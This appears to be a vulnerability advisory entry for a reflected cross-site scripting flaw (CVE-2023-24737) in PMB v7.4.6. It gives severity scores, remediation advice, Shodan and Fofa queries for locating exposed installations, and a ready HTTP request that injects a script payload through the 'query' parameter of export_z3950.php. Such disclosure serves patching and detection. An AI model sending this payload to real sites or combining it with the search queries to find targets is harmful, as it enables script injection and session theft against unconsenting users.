| Title | PMB v7.4.6 - Cross-Site Scripting |
|---|---|
| Author | r3Y3r53 |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. |
| Remediation | Apply the latest security patch or upgrade to a non-vulnerable version of PMB. |
| CVSS Score | 6.1 |
| EPSS Score | 0.1156 |
| CVE ID | CVE-2023-24737 |
| CWE ID | CWE-79 |
| Shodan Query | http.favicon.hash:1469328760http.html:"pmb group" |
| Fofa Query | body="pmb group"icon_hash=1469328760 |
| Tags | cve2023 cve xss pmb pmb_project sigb vuln |
PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the ‘query’ parameter.
GET /pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-24737.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-24737.pcap
N/AN/A